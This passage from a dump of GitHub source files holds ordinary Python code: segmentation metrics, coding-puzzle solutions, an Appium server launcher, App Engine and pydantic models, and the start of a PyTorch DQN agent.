h)\n\n return res\n\n\n\ndef class2one_hot(seg, C):\n if len(seg.shape) == 2: # Only w, h, used by the dataloader\n seg = seg.unsqueeze(dim=0)\n assert sset(seg, list(range(C)))\n\n b, w, h = seg.shape # type: Tuple[int, int, int]\n\n res = torch.stack([seg == c for c in range(C)], dim=1).type(torch.int32)\n assert res.shape == (b, C, w, h)\n assert one_hot(res)\n\n return res\n\ndef probs2one_hot(probs):\n _, C, _, _ = probs.shape\n assert simplex(probs)\n\n res = class2one_hot(probs2class(probs), C)\n assert res.shape == probs.shape\n assert one_hot(res)\n\n return res\n\n\ndef sset(a, sub):\n #print(uniq(a))\n #print(sub)\n return uniq(a).issubset(sub)\n\n\ndef eq(a, b):\n return torch.eq(a, b).all()\n\n\ndef simplex(t, axis=1):\n _sum = t.sum(axis).type(torch.float32)\n #print(_sum.sum())\n _ones = torch.ones_like(_sum, dtype=torch.float32)\n #print(_ones.sum())\n return _ones.sum() == _sum.sum()\n\ndef uniq(a):\n return set(torch.unique(a.cpu()).numpy())\n\ndef one_hot(t, axis=1):\n #print(simplex(t, axis))\n #print(sset(t, [0, 1]))\n return simplex(t, axis) and sset(t, [0, 1])\n\ndef meta_dice(sum_str, label, pred, smooth = 1e-8):\n assert label.shape == pred.shape\n assert one_hot(pred.detach())\n\n inter_size: Tensor = einsum(sum_str, [intersection(label, pred)]).type(torch.float32)\n sum_sizes: Tensor = (einsum(sum_str, [label]) + einsum(sum_str, [pred])).type(torch.float32)\n\n dices: Tensor = (2 * inter_size + smooth) / (sum_sizes + smooth)\n\n return dices\n\n\n\nclass MetricManager(object):\n def __init__(self, metric_fns):\n self.metric_fns = metric_fns\n self.result_dict = defaultdict(float)\n self.num_samples = 0 \n \n def __call__(self, prediction, ground_truth):\n self.num_samples += len(prediction)\n for metric_fn in self.metric_fns:\n for p, gt in zip(prediction, ground_truth):\n res = metric_fn(p, gt)\n dict_key = metric_fn.__name__\n self.result_dict[dict_key] += res\n \n def get_results(self):\n res_dict = {}\n for key, val in self.result_dict.items():\n res_dict[key] = val / self.num_samples\n return res_dict\n \n def reset(self):\n self.num_samples = 0\n self.result_dict = defaultdict(float)\n \n\ndef numeric_score(prediction, groundtruth):\n \"\"\"Computation of statistical numerical scores:\n\n * FP = False Positives\n * FN = False Negatives\n * TP = True Positives\n * TN = True Negatives\n\n return: tuple (FP, FN, TP, TN)\n \"\"\"\n FP = np.float(np.sum((prediction == 1) & (groundtruth == 0)))\n FN = np.float(np.sum((prediction == 0) & (groundtruth == 1)))\n TP = np.float(np.sum((prediction == 1) & (groundtruth == 1)))\n TN = np.float(np.sum((prediction == 0) & (groundtruth == 0)))\n return FP, FN, TP, TN\n\ndef dice_per_organ(prediction, groundtruth, thresh):\n pred = prediction.detach().numpy()\n tr = groundtruth.detach().numpy()\n num = np.sum(pred*tr)\n s = np.sum(pred)\n '''\n if s < thresh:\n s = 0\n num = 0\n '''\n denum = s + np.sum(tr)\n if denum == 0 and num == 0:\n d = 1\n else:\n d = 2*(num/denum)\n return d\n\ndef jaccard_score(prediction, groundtruth):\n pflat = prediction.flatten()\n gflat = groundtruth.flatten()\n return (1 - spatial.distance.jaccard(pflat, gflat)) * 100.0\n\n\ndef hausdorff_score(prediction, groundtruth):\n return spatial.distance.directed_hausdorff(prediction, groundtruth)[0]\n\n\ndef precision_score(prediction, groundtruth):\n # PPV\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TP + FP) <= 0.0:\n return 0.0\n\n precision = np.divide(TP, TP + FP)\n return precision * 100.0\n\ndef dice_metric(input,target):\n \"\"\"\n input is a torch variable of size BatchxnclassesxHxW representing log probabilities for each class\n target is a 1-hot representation of the groundtruth, shoud have same size as the input\n \"\"\"\n assert input.size() == target.size(), \"Input sizes must be equal.\"\n uniques=np.unique(target.numpy())\n assert set(list(uniques))<=set([0,1]), \"target must only contain zeros and ones\"\n\n probs = input\n num=probs*target#b,c,h,w--p*g\n num=torch.sum(num,dim=3)#b,c,h\n num=torch.sum(num,dim=2)\n\n den1=probs*probs#--p^2\n den1=torch.sum(den1,dim=3)#b,c,h\n den1=torch.sum(den1,dim=2)\n\n den2=target*target#--g^2\n den2=torch.sum(den2,dim=3)#b,c,h\n den2=torch.sum(den2,dim=2)#b,c\n \n dice=np.squeeze(2*(num/(den1+den2)))\n \n if input.shape[1] != 1:\n for i, d in enumerate(dice):\n if np.isnan(d) == 1:\n dice[i] = 1\n else:\n if np.isnan(dice) == 1:\n dice = 1\n dice = torch.tensor(dice)\n\n # return dice.detach().numpy()[1:]\n return dice.detach().numpy()\n\ndef recall_score(prediction, groundtruth):\n # TPR, sensitivity\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TP + FN) <= 0.0:\n return 0.0\n TPR = np.divide(TP, TP + FN)\n return TPR * 100.0\n\n\ndef specificity_score(prediction, groundtruth):\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TN + FP) <= 0.0:\n return 0.0\n TNR = np.divide(TN, TN + FP)\n return TNR * 100.0\n\n\ndef intersection_over_union(prediction, groundtruth):\n FP, FN, TP, TN = numeric_score(prediction, groundtruth)\n if (TP + FP + FN) <= 0.0:\n return 0.0\n return TP / (TP + FP + FN) * 100.0\n\n\ndef accuracy_score(prediction, groundtruth):\n pred_thresh = threshold_predictions(prediction)\n FP, FN, TP, TN = numeric_score(pred_thresh, groundtruth)\n N = FP + FN + TP + TN\n accuracy = np.divide(TP + TN, N)\n return accuracy * 100.0\n\ndef compute_stats(metric, mean_prev, var_prev, n):\n '''\n computes the moving average of a metric \n @parameters:\n @metric = newest vaue to add\n @mean_prev = previous mean \n @var_prev = previous variance\n @n = current total number of samples\n '''\n if n > 1:\n mean_n = (1.00/n)*(metric + (n-1)*mean_prev)\n var_n = (np.float(n-2)/(n-1))*(var_prev) + (1.00/n)*(metric - mean_prev)**2\n else:\n mean_n = metric\n var_n = 0\n \n return mean_n, var_n\n \n \n \n \n \n \n","repo_name":"rosanajurdi/BB-UNet_UNet_with_bounding_box_prior","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":7713,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"2296640394","text":"def solution(park, routes):\n answer = []\n W, H = len(park[0]), len(park)\n for row, line in enumerate(park):\n if \"S\" in set(line):\n answer = [row, line.index(\"S\")]\n break\n \n for route in routes:\n op, n = route.split()\n n = int(n)\n if op == \"E\":\n if (answer[1] + n >= W) or (\"X\" in park[answer[0]][answer[1] + 1 : answer[1] + n + 1]): continue\n answer[1] += n\n elif op == \"W\":\n if (answer[1] - n < 0) or (\"X\" in park[answer[0]][answer[1] - n : answer[1]]): continue\n answer[1] -= n\n elif op == \"S\":\n target = list(zip(*park))[answer[1]]\n if (answer[0] + n >= H) or (\"X\" in target[answer[0] + 1 : answer[0] + n + 1]): continue\n answer[0] += n\n else:\n target = list(zip(*park))[answer[1]]\n if (answer[0] - n < 0) or (\"X\" in target[answer[0] - n : answer[0]]): continue\n answer[0] -= n\n \n return answer","repo_name":"N1ghtsky0/algorithm_study","sub_path":"프로그래머스/unrated/172928. 공원 산책/공원 산책.py","file_name":"공원 산책.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"19123752406","text":"import os\nimport socket\nimport subprocess\nfrom time import sleep\nimport multiprocessing\nimport yaml\nfrom time import ctime\n\nwith open('desired_caps.yaml', 'r') as file:\n data = yaml.load(file, Loader=yaml.FullLoader)\n\n\ndef appium_start_sync():\n '''并发启动appium服务'''\n print('====appium_start_sync=====')\n\n # 构建appium进程组\n appium_process = []\n\n # 加载appium进程\n\n for i in range(len(data['devices_list'].split(\",\"))):\n host = '127.0.0.1'\n port = 4723 + 2 * i\n\n appium = multiprocessing.Process(target=start_appium_action, args=(host, port))\n appium_process.append(appium)\n\n # 启动appium服务\n for appium in appium_process:\n appium.start()\n for appium in appium_process:\n appium.join()\n\n sleep(5)\n\n\ndef start_appium_action(host, port):\n '''检测端口是否被占用,如果没有被占用则启动appium服务'''\n if check_port(host, port):\n appium_start(host, port)\n else:\n print('appium %s start failed!' % port)\n release_port(port)\n\n return True\n\n\ndef check_port(host, port):\n \"\"\"检测指定的端口是否被占用\"\"\"\n\n # 创建socket对象\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.connect((host, port))\n s.shutdown(2)\n except OSError as msg:\n print('port %s is available! ' % port)\n print(msg)\n return True\n else:\n print('port %s already be in use !' % port)\n return False\n\n\ndef appium_start(host, port):\n '''启动appium server'''\n bootstrap_port = str(port + 1)\n cmd = 'start /b appium -a ' + host + ' -p ' + str(port) + ' -bp ' + str(bootstrap_port)\n\n print('%s at %s' % (cmd, ctime()))\n subprocess.Popen(cmd, shell=True, stdout=open('./appium_log/' + str(port) + '.log', 'a'), stderr=subprocess.STDOUT)\n\n\ndef release_port(port):\n \"\"\"释放指定的端口\"\"\"\n\n # 查找对应端口的pid\n cmd_find = 'netstat -aon | findstr %s' % port\n print(cmd_find)\n\n # 返回命令执行后的结果\n result = os.popen(cmd_find).read()\n print(result)\n\n if str(port) and 'LISTENING' in result:\n # 获取端口对应的pid进程\n i = result.index('LISTENING')\n start = i + len('LISTENING') + 7\n end = result.index('\\n')\n pid = result[start:end]\n\n # 关闭被占用端口的pid\n cmd_kill = 'taskkill -f -pid %s' % pid\n print(cmd_kill)\n os.popen(cmd_kill)\n\n else:\n print('port %s is available !' % port)\n\n\nif __name__ == '__main__':\n appium_start_sync()\n # for i in range(60):\n # release_port(i+4720)\n","repo_name":"dzh112/app_multi","sub_path":"APPIUM_MULTI/appium_multi.py","file_name":"appium_multi.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14228119258","text":"from collections import deque\nimport sys\n\n\ndef get_team(drawing):\n team = [[-1] * N for _ in range(N)]\n team_block_count = []\n team_block_value = []\n\n team_num = -1\n for r in range(N):\n for c in range(N):\n if team[r][c] == -1:\n team_num += 1\n team[r][c] = team_num\n draw_num = drawing[r][c]\n team_block_count.append(0)\n team_block_value.append(draw_num)\n\n queue = deque([[r, c]])\n while queue:\n cur_r, cur_c = queue.popleft()\n team_block_count[team_num] +=1\n for move in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n next_r, next_c = cur_r + move[0], cur_c + move[1]\n if next_r >= 0 and next_r < N and next_c >= 0 and next_c < N and drawing[next_r][next_c]==draw_num and team[next_r][next_c] == -1:\n team[next_r][next_c] = team_num\n queue.append([next_r, next_c])\n # print(team)\n return team_num+1, team, team_block_count, team_block_value\n\ndef get_score(team, total_team, team_block_count, team_block_value):\n team_adj = [[0]*total_team for _ in range(total_team)]\n\n for r in range(N):\n for c in range(N):\n cur_team = team[r][c]\n for move in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n next_r, next_c = r + move[0], c + move[1]\n if next_r >= 0 and next_r < N and next_c >= 0 and next_c < N :\n next_team = team[next_r][next_c]\n # print(cur_team, next_team)\n team_adj[cur_team][next_team] += 1\n\n total_score = 0\n for i in range(total_team):\n for j in range(i+1, total_team):\n total_score += (team_block_count[i] + team_block_count[j]) * team_block_value[i] * team_block_value[j] * team_adj[i][j]\n\n # print(\"score\", total_score)\n return total_score\n\ndef rotate_drawing(drawing):\n\n new_drawing = [[0]*N for _ in range(N)]\n mid = N//2\n\n # 십자 회전\n center_r, center_c = mid, mid\n for i in range(N):\n r, c = i, mid\n # 반시계 회전\n r1, c1 = -1*(c-center_c)+center_r, (r-center_r)+center_c\n new_drawing[r1][c1] = drawing[r][c]\n r, c = mid, i\n r2, c2 = -1*(c-center_c)+center_r, (r-center_r)+center_c\n new_drawing[r2][c2] = drawing[r][c]\n\n\n center_r, center_c = (N-mid)/2-1, (N-mid)/2-1\n # print(center_r, center_c)\n for i in range(mid):\n for j in range(mid):\n new_i, new_j = int((j-center_c)+center_r), int(-1*(i-center_r)+center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n center_r, center_c = (N - mid) / 2 + mid, (N - mid) / 2 + mid\n # print(center_r, center_c)\n for i in range(mid+1, N):\n for j in range(mid+1, N):\n new_i, new_j = int((j - center_c) + center_r), int(-1 * (i - center_r) + center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n center_r, center_c = (N - mid) / 2 + mid, (N-mid)/2-1\n for i in range(mid+1, N):\n for j in range(mid):\n new_i, new_j = int((j - center_c) + center_r), int(-1 * (i - center_r) + center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n center_r, center_c = (N-mid)/2-1, (N - mid) / 2 + mid\n for i in range(mid):\n for j in range(mid+1, N):\n new_i, new_j = int((j - center_c) + center_r), int(-1 * (i - center_r) + center_c)\n new_drawing[new_i][new_j] = drawing[i][j]\n\n # for center_r in range((N-mid))\n # for center_r, center_c in [()]\n # print(drawing)\n # print(new_drawing)\n\n # print(-1*(c-center_c)+center_r, (r-center_r)+center_c)\n # print((c-center_c)+center_r, -1*(r-center_r)+center_c)\n\n return new_drawing\n\n\nif __name__ == \"__main__\":\n sys.stdin = open(\"../input.txt\", \"r\")\n N = int(sys.stdin.readline())\n drawing = [list(map(int, sys.stdin.readline().split(\" \"))) for _ in range(N)]\n # N = (int)input()\n # drawing = [list(map(int, input().split(\" \"))) for _ in range(N)]\n\n total_score = 0\n for _ in range(4):\n total_team_num, team_map, team_block_count, team_block_value = get_team(drawing)\n total_score+=get_score(team_map, total_team_num, team_block_count, team_block_value)\n drawing = rotate_drawing(drawing)\n\n print(total_score)","repo_name":"suuuuuuuubin/Algo_Study","sub_path":"CodeTree/예술성_2022상반기오전2번.py","file_name":"예술성_2022상반기오전2번.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30473045398","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\n\nT = int(input())\n\nfor ts in range(1, T+1):\n arr = [list(map(int, input().split())) for _ in range(9)]\n ans = 1\n\n #세칸씩\n for n in range(0, len(arr), 3):\n for i in range(3):\n num = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0}\n for j in range(3):\n one_line = arr[n + j][i * 3:(i + 1) * 3]\n for k in one_line:\n if num[k] == 0:\n num[k] = 1\n else:\n ans = 0\n break\n #가로\n for i in range(9):\n if len(set(arr[i])) != 9:\n ans = 0\n break\n #세로\n arr2 = list(zip(*arr))\n for i in range(9):\n num = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0, 7: 0, 8: 0, 9: 0}\n for j in range(9):\n if num[arr2[i][j]] == 0:\n num[arr2[i][j]] = 1\n else:\n ans = 0\n\n print(f'#{ts} {ans}')","repo_name":"younga-Lee/TIL","sub_path":"ssafy9_1/swea/D2/1974 스도쿠 검증.py","file_name":"1974 스도쿠 검증.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37515847305","text":"from typing import Dict, List\n\nfrom pydantic import BaseModel, Field\n\nfrom common.utils.enums import PhaseLabels\nfrom entities.Multiflash import (\n ComponentFractions,\n Multiflash,\n MultiflashResult,\n PhaseValues,\n)\n\n\nclass MultiflashResponse(BaseModel):\n phase_values: Dict[PhaseLabels, Dict[str, float]] = Field(\n ...,\n description=\"Phase labels (vapor, liquid, aqueous, mercury) with \"\n \"their fraction of unity and mercury concentration\",\n alias=\"phaseValues\",\n )\n component_fractions: Dict[str, List[float]] = Field(\n ...,\n description=\"Mole fractions of each of the components (Note: mass is discarded from MultiflashResult)\",\n alias=\"componentFractions\",\n )\n feed_fractions: Dict[str, float] = Field(\n ..., description=\"Ratio of components in the feed (guaranteed to sum to 1)\", alias=\"feedFractions\"\n )\n\n class Config:\n allow_mutation = False\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"phaseValues\": {\n \"Mercury\": {\"percentage\": 0.13710670215621407, \"mercury\": 1000000000},\n \"Vapor\": {\"percentage\": 0.5923732280108018, \"mercury\": 3426.2630579508586},\n \"Aqueous\": {\"percentage\": 0.2705200698329841, \"mercury\": 82.76725027120922},\n },\n \"componentFractions\": {\n \"1\": [3.153640195684568e-23, 0.17798810356465122, 0.001283168757794131],\n \"2\": [8.232685472278065e-23, 0.42824009015281783, 0.00007363513673381724],\n \"3\": [6.089783280850285e-25, 0.0035486377271550557, 0.9984849101778882],\n \"5\": [1.0000000000000002, 4.038754670974074e-7, 7.447270506156235e-9],\n \"101\": [7.260898200622709e-23, 0.390222764679909, 0.00015827848031333905],\n },\n \"feedFractions\": {\"1\": 0.1057, \"2\": 0.2535, \"3\": 0.2720, \"101\": 0.23102, \"5\": 0.137},\n }\n }\n\n @classmethod\n def from_values(\n cls,\n phase_values: Dict[PhaseLabels, PhaseValues],\n component_fractions: Dict[str, ComponentFractions],\n feed_fractions: List[float],\n ) -> \"MultiflashResponse\":\n # convert phase_values to dictionary\n new_phase_values = {label: value._asdict() for label, value in phase_values.items()}\n # convert component_fraction to dictionary with lists (not numpy arrays):\n new_component_fractions = {\n component_id: component_fractions[component_id].moles.tolist()\n for component_id in component_fractions.keys()\n }\n # feed fractions to dictionary:\n new_feed_fractions = {\n component_id: feed_ratio for component_id, feed_ratio in zip(component_fractions.keys(), feed_fractions)\n }\n return MultiflashResponse(\n phase_values=new_phase_values,\n component_fractions=new_component_fractions,\n feed_fractions=new_feed_fractions,\n )\n\n @property\n def phase_labels(self) -> List[PhaseLabels]:\n return list(self.phase_values.keys())\n\n @property\n def phase_fractions(self) -> List[float]:\n return [value[\"percentage\"] for key, value in self.phase_values.items()]\n\n\ndef compute_multiflash_use_case(multiflash: Multiflash) -> MultiflashResponse:\n multiflash_result: MultiflashResult = multiflash.compute()\n return MultiflashResponse.from_values(*multiflash_result)\n","repo_name":"equinor/mercury","sub_path":"api/src/features/multiflash/multiflash_use_case.py","file_name":"multiflash_use_case.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31476003827","text":"from datetime import datetime\n\nfrom bot import db_session\nfrom models.support import SupportTicket\n\n\ndef create_support_ticket(ticket_type: str, chat: bool, submit_user: str, anonymous: bool, description: str,\n notification_id: str):\n ticket = SupportTicket()\n ticket.ticket_type = ticket_type\n ticket.chat = chat\n ticket.submit_user = submit_user\n ticket.anonymous = anonymous\n ticket.description = description\n ticket.notification_id = notification_id\n ticket.created_at = datetime.now()\n ticket.status = 'NEW'\n db_session.add(ticket)\n db_session.commit()\n\n\ndef get_support_by_notification_id(notification_id: str) -> SupportTicket:\n ticket = db_session.query(SupportTicket).filter(SupportTicket.notification_id == notification_id).first()\n return ticket\n\n\ndef get_support_by_channel_id(support_channel: int) -> SupportTicket:\n ticket = db_session.query(SupportTicket).filter(SupportTicket.support_channel == str(support_channel)).first()\n return ticket\n\n\ndef update_support_status(ticket_id: int, status: str, support_channel: int = None):\n ticket = db_session.query(SupportTicket).filter(SupportTicket.ticket_id == str(ticket_id)).first()\n ticket.status = status\n if status == 'RESOLVED':\n ticket.resolved_at = datetime.now()\n if support_channel:\n ticket.support_channel = str(support_channel)\n db_session.commit()\n\n\ndef get_open_support_tickets():\n tickets = db_session.query(SupportTicket).filter(SupportTicket.support_channel != None and SupportTicket.status !=\n 'RESOLVED').all()\n return tickets\n","repo_name":"rude-jerk/tea-bot","sub_path":"utils/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72160476380","text":"import pak\n\nfrom public import public\n\nfrom aioconsole import aprint\n\nfrom .proxy import Proxy\n\nfrom ..packets import Packet, ServerboundPacket\n\n@public\nclass LoggingProxy(Proxy):\n LOG_GENERIC_PACKETS = True\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if self.LOG_GENERIC_PACKETS:\n self.register_packet_listener(self._log_packet, Packet)\n else:\n self.register_packet_listener(self._log_specific_packets, Packet)\n\n async def _log_packet(self, source, packet):\n if isinstance(packet, ServerboundPacket):\n bound = \"Serverbound\"\n else:\n bound = \"Clientbound\"\n\n if source.is_satellite:\n connection = \"SATELLITE\"\n else:\n connection = \"MAIN\"\n\n await aprint(f\"{connection}: {bound}: {packet}\")\n\n async def _log_specific_packets(self, source, packet):\n if isinstance(packet, pak.GenericPacket):\n return\n\n await self._log_packet(source, packet)\n","repo_name":"friedkeenan/caseus","sub_path":"caseus/proxies/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"39712977509","text":"import time\nstart_time=time.time()\nframe_count=0\nfps_streams={}\n\nclass GETFPS:\n def __init__(self,stream_id):\n global start_time\n self.start_time=start_time\n self.is_first=True\n global frame_count\n self.frame_count=frame_count\n self.stream_id=stream_id\n def get_fps(self):\n end_time=time.time()\n if(self.is_first):\n self.start_time=end_time\n self.is_first=False\n if(end_time-self.start_time>5):\n print(\"**********************FPS*****************************************\")\n print(\"Fps of stream\",self.stream_id,\"is \", float(self.frame_count)/5.0)\n self.frame_count=0\n self.start_time=end_time\n else:\n self.frame_count=self.frame_count+1\n def print_data(self):\n print('frame_count=',self.frame_count)\n print('start_time=',self.start_time)\n\nclass Timer:\n def __init__(self, source_number):\n for i in range(0,source_number):\n fps_streams[\"stream{0}\".format(i)]=GETFPS(i)\n def get_stream_fps(index):\n return fps_streams[\"stream{0}\".format(index)]\n\n\n","repo_name":"zhouyuchong/deepstream-kit","sub_path":"utils/fps.py","file_name":"fps.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"7123958435","text":"import sys\nfrom setting import static_variable\n\n__author__ = 'Nazzareno'\n\nfrom Class.position import Position\n\nimport logging\nimport time\nimport datetime\n\nfrom Cloud_Storage.user_car import User_car\nfrom Cloud_Storage.user import User\n\nfrom google.appengine.ext import ndb\n\n\nclass Car(ndb.Model):\n brand = ndb.StringProperty()\n latitude = ndb.StringProperty()\n longitude = ndb.StringProperty()\n timestamp = ndb.StringProperty()\n bluetooth_MAC = ndb.StringProperty()\n bluetooth_name = ndb.StringProperty()\n name = ndb.StringProperty()\n email = ndb.StringProperty()\n register = ndb.StringProperty()\n lastdriver = ndb.StringProperty()\n isParked = ndb.BooleanProperty()\n uuid = ndb.StringProperty()\n bmaj = ndb.StringProperty()\n bmin = ndb.StringProperty()\n marker_color = ndb.FloatProperty()\n\n def getPositionFromID(self):\n result = Position(self.latitude, self.longitude)\n return result\n\n def updatePosition(self, latitude, longitude, lastdriver):\n self.latitude = latitude\n self.longitude = longitude\n self.lastdriver = lastdriver\n\n st = str(datetime.datetime.utcnow() + datetime.timedelta(hours=1))\n\n self.timestamp = st\n self.isParked = True\n self.put()\n return 0\n\n def updateParked(self):\n self.isParked = False\n self.put()\n return 0\n\n def to_string_json_car(self):\n car_users = []\n id_users = User_car.getUserFromCar(self.key.id())\n for id_user in id_users:\n user = User.get_user_by_id(id_user.id_user)\n car_users.append(user.toString_JSON())\n return {\n \"ID_car\": str(self.key.id()), \"Brand\": str(self.brand), \"Name\": str(self.name),\n \"Latitude\": str(self.latitude),\n \"Longitude\": str(self.longitude), \"Users\": car_users, \"Timestamp\": str(self.timestamp),\n \"Register\": str(self.register), \"Last_driver\": str(self.lastdriver), \"isParked\": self.isParked,\n \"Bluetooth_MAC\": str(self.bluetooth_MAC), \"Bluetooth_Name\": str(self.bluetooth_name),\n \"UUID\": str(self.uuid), \"Bmin\": str(self.bmin), \"Bmaj\": str(self.bmaj),\n \"Marker_Color\": self.marker_color\n }\n\n @staticmethod\n def updateUUID(id,uuid, bmaj, bmin):\n temp_car = Car.getCarbyID(id)\n temp_car.bmaj = bmaj\n temp_car.bmin = bmin\n temp_car.uuid = uuid\n temp_car.put()\n return 0\n\n\n def update(self, bluetooth_MAC, bluetooth_name, brand, email, latitude, longitude, name, maker_color):\n self.latitude = latitude\n self.longitude = longitude\n self.bluetooth_MAC = bluetooth_MAC\n self.bluetooth_name = bluetooth_name\n self.brand = brand\n self.email = email\n self.name = name\n self.marker_color = maker_color\n self.put()\n return 0\n\n @staticmethod\n def getCarbyID(id):\n\n if static_variable.DEBUG and static_variable.DEBUG_ALL_CARS:\n logging.debug(\"Value ID: \"+str(id)+\" Cast a float: \"+str(\"%.0f\" % float(id)))\n\n app_key = Car.get_by_id(long(\"%.0f\" % float(id))) # This why sometime arrive id like '4.93745548034048E15'\n return app_key\n\n @staticmethod\n def get_json(id):\n app_key = Car.getCarbyID(id)\n return app_key.to_string_json_car()\n\n @staticmethod\n def update_position_ID(id, latitude, longitude, lastdriver):\n if static_variable.DEBUG and static_variable.DEBUG_UPDATE_POSITION:\n logging.debug(\"latitude: \"+str(latitude)+\" longitude: \"+str(longitude))\n logging.debug(\"%.7f\" % float(latitude))\n conv_latitude = \"%.7f\" % float(latitude) # This why sometime arrive id like '4.93745548034048E15'\n conv_longitude = \"%.7f\" % float(longitude) # This why sometime arrive id like '4.93745548034048E15'\n temp_car = Car.getCarbyID(id)\n return temp_car.updatePosition(conv_latitude, conv_longitude, lastdriver)\n\n @staticmethod\n def pick_car(id):\n temp_car = Car.getCarbyID(id)\n return temp_car.updateParked()\n\n @staticmethod\n def update_car(id, bluetooth_MAC, bluetooth_name, brand, name, register, marker_color):\n temp_car = Car.getCarbyID(id)\n temp_car.bluetooth_MAC = bluetooth_MAC\n temp_car.bluetooth_name = bluetooth_name\n temp_car.brand = brand\n temp_car.name = name\n temp_car.register = register\n temp_car.marker_color = marker_color\n temp_car.put()\n\n @staticmethod\n def delete_car_ID(id):\n app_key = Car.getCarbyID(id)\n app_key.key.delete()\n\n @staticmethod\n def get_name_id(ID):\n app_key = Car.getCarbyID(ID)\n return app_key.name\n\n @staticmethod\n def get_position_id(ID):\n app_key = Car.getCarbyID(ID)\n return app_key.getPositionFromID()\n\n @staticmethod\n def get_all_cars(email_user):\n try:\n cars = Car.query(Car.email == email_user)\n except:\n logging.debug(sys.exc_info())\n return cars\n\n","repo_name":"FamilyParking/Project","sub_path":"Server/Cloud_Storage/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"70394320221","text":"\"\"\"P R O M P T F O R A D D R E S S B O O K\"\"\"\n\nfrom prompt_toolkit.lexers import Lexer\nfrom prompt_toolkit.styles.named_colors import NAMED_COLORS\nfrom prompt_toolkit.completion import NestedCompleter\n\n\nclass RainbowLexer(Lexer):\n def lex_document(self, document):\n colors = list(sorted({\"Teal\": \"#008080\"}, key=NAMED_COLORS.get))\n\n def get_line(lineno):\n return [\n (colors[i % len(colors)], c)\n for i, c in enumerate(document.lines[lineno])\n ]\n\n return get_line\n\n\nCompleter = NestedCompleter.from_nested_dict({'hello': None, 'exit': None, 'close': None,\n 'change': None, 'phone': None, 'show': None,\n 'del': None, 'birth': None, 'email': None,\n 'nextbirth': None, 'find': None, 'info': None,\n 'add': None, 'address': None, 'tags': None,\n 'tag+': None, '.': None, '0': None})\n","repo_name":"Sanyavas/assistant-team-project","sub_path":"app/prompt_tool_ab.py","file_name":"prompt_tool_ab.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"2220989462","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom collections import namedtuple\nfrom copy import deepcopy\nimport random\n# # \nimport ray\n# from rlcard.agents.dqn_agent import Memory\nfrom rlcard.utils.utils import remove_illegal\n\nTransition = namedtuple('Transition', ['state', 'action', 'reward', 'next_state', 'done'])\n\n\nclass DQNAgent(object):\n '''\n Approximate clone of rlcard.agents.dqn_agent.DQNAgent\n that depends on PyTorch instead of Tensorflow\n '''\n def __init__(self,\n scope,\n replay_memory_size=20000,\n replay_memory_init_size=100,\n update_target_estimator_every=1000,\n discount_factor=0.99,\n epsilon_start=1.0,\n epsilon_end=0.1,\n epsilon_decay_steps=20000,\n batch_size=32,\n action_num=2,\n state_shape=[54],\n train_every=1,\n mlp_layers=[512,512],\n learning_rate=0.00005,\n device=None):\n\n '''\n Q-Learning algorithm for off-policy TD control using Function Approximation.\n Finds the optimal greedy policy while following an epsilon-greedy policy.\n\n Args:\n scope (str): The name of the DQN agent\n replay_memory_size (int): Size of the replay memory\n replay_memory_init_size (int): Number of random experiences to sampel when initializing\n the reply memory.\n update_target_estimator_every (int): Copy parameters from the Q estimator to the\n target estimator every N steps\n discount_factor (float): Gamma discount factor\n epsilon_start (int): Chance to sample a random action when taking an action.\n Epsilon is decayed over time and this is the start value\n epsilon_end (int): The final minimum value of epsilon after decaying is done\n epsilon_decay_steps (int): Number of steps to decay epsilon over\n batch_size (int): Size of batches to sample from the replay memory\n evaluate_every (int): Evaluate every N steps\n action_num (int): The number of the actions\n state_space (list): The space of the state vector\n train_every (int): Train the network every X steps.\n mlp_layers (list): The layer number and the dimension of each layer in MLP\n learning_rate (float): The learning rate of the DQN agent.\n device (torch.device): whether to use the cpu or gpu\n '''\n self.use_raw = False\n self.scope = scope\n self.replay_memory_init_size = replay_memory_init_size\n self.update_target_estimator_every = update_target_estimator_every\n self.discount_factor = discount_factor\n self.epsilon_decay_steps = 